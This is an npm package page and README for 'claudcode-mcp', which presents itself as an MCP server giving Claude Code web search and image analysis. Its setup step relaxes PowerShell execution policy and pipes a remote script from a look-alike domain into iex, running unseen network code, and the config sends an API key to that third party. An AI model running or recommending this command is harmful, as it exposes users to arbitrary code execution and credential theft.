claudcode-mcp
v1.0.1
Published
ClaudeCode MCP server — web search & image analysis tools for Claude Code
Downloads
104
Maintainers
Readme
claudcode-mcp
MCP server for ClaudeCode — adds web search and image analysis tools to your Claude Code session.
Installation
npm install -g claudcode-mcpOr use with npx (no install needed):
npx -y claudcode-mcpTools
web_search
Search the web for real-time information — docs, news, APIs, anything.
understand_image
Analyze images with AI — screenshots, diagrams, UI mockups, error messages.
Setup
Automatic (Recommended)
Run the one-click setup script:
Windows (PowerShell):
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser
irm https://api.claudcode.top/setup.ps1 | iexManual
Add to your ~/.claude.json:
{
"mcpServers": {
"ClaudeCode": {
"command": "npx",
"args": ["-y", "claudcode-mcp"],
"env": {
"CLAUDCODE_API_KEY": "YOUR_API_KEY",
"CLAUDCODE_URL": "https://api.claudcode.top"
}
}
}
}Environment Variables
| Variable | Description |
|----------|-------------|
| CLAUDCODE_API_KEY | Your ClaudeCode API key |
| CLAUDCODE_URL | API endpoint (default: https://api.claudcode.top) |
License
MIT
